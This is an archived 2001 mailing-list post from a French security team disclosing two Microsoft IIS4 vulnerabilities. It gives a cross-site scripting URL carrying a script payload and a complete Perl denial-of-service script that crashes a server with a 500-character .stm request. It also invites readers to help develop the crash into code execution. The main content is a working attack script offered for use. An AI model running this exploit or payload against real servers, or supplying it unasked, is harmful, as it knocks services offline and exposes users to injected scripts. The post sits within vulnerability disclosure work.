Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

New D.O.S on IIS4 & a new cross site scripting vuln

From: "Admin [iSecureLabs]" <admin () ISECURELABS COM>
Date: Thu, 29 Mar 2001 16:55:08 +0200
--[ iSecureLabs.com French Security Team ]--


We have found 2 vulnerability on Microsoft IIS4
- Cross Site Scripting
- D.O.S

--[ The first one:
It is a cross site scripting, using this crafted url
http://server.com/foo/<script>alert('test')</script>.stm
it will execute the JavaScript code on your computer.

--[ The seconde one:
By requesting several  times a .stm file 500 char long
(http://server.com/foo/[a x 500].stm) the IIS4 server crash.
Perhaps it is possible to use this vulnerability to execute arbitrary code.
We are currently working on a way to exploit this vulnerability.
If someone wants to help us, it is ok ;-)

Here is the exploit for the D.O.S one:

---<cut>---

#!/usr/bin/perl
# IIS4 .STM D.O.S by aurelien.cabezon () iSecureLabs com -
http://www.iSecureLabs.com

use IO::Socket;

if (@ARGV <2){print "Usage: ./stm.pl <host> <port>\n"; exit;}

$overflow = "a" x 500;

sub connect()
{

$Socket= IO::Socket::INET->new(Proto=>"TCP",
                             PeerAddr=>$ARGV[0],
                             PeerPort=>"$ARGV[1]",)
                             or die "Connection impossible a $ARGV[0] : f$!\n";

        $Socket -> autoflush(1);

        print $Socket "GET /foo/$overflow.stm HTTP/1.0\n\n";


        print " \n\n> GET $ARGV[0]/foo/$overflow.stm HTTP/1.0\n\n";

        print " > Server response:\n\n";

                while(<$Socket>){

                        chomp ($reponse = <$Socket>);
                        print "$reponse\n";

                                }

        print "\n> Data Sent. Server crashed.\n";


close $Socket;

}
&connect;

---<cut>---

Cabezon Aurélien
aurelien.cabezon () iSecureLabs com
http://www.iSecureLabs.com
Previous By Date Next
Previous By Thread Next

Current thread: